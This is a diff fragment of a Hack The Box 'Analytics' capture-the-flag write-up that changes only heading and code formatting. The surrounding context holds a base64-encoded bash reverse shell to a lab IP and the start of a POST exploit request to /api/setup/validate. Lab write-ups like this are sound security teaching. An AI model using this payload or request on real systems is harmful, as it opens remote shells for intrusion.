Z4kr-Sec/z4kr-sec.github.io/content/HTB/Easy/Analytics-HTB.md

 ```
 YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMy80NDMgIDA+JjEK
 ```
-### Exploit execution.
+### Exploit execution
-Using Burp Suite's Repeater, we sent a POST request to */api/setup/validate* with the  payload embedded in the request body.
+Using Burp Suite's Repeater, we sent a POST request to `/api/setup/validate` with the payload embedded in the request body.

 ```json
 POST /api/setup/validate HTTP/1.1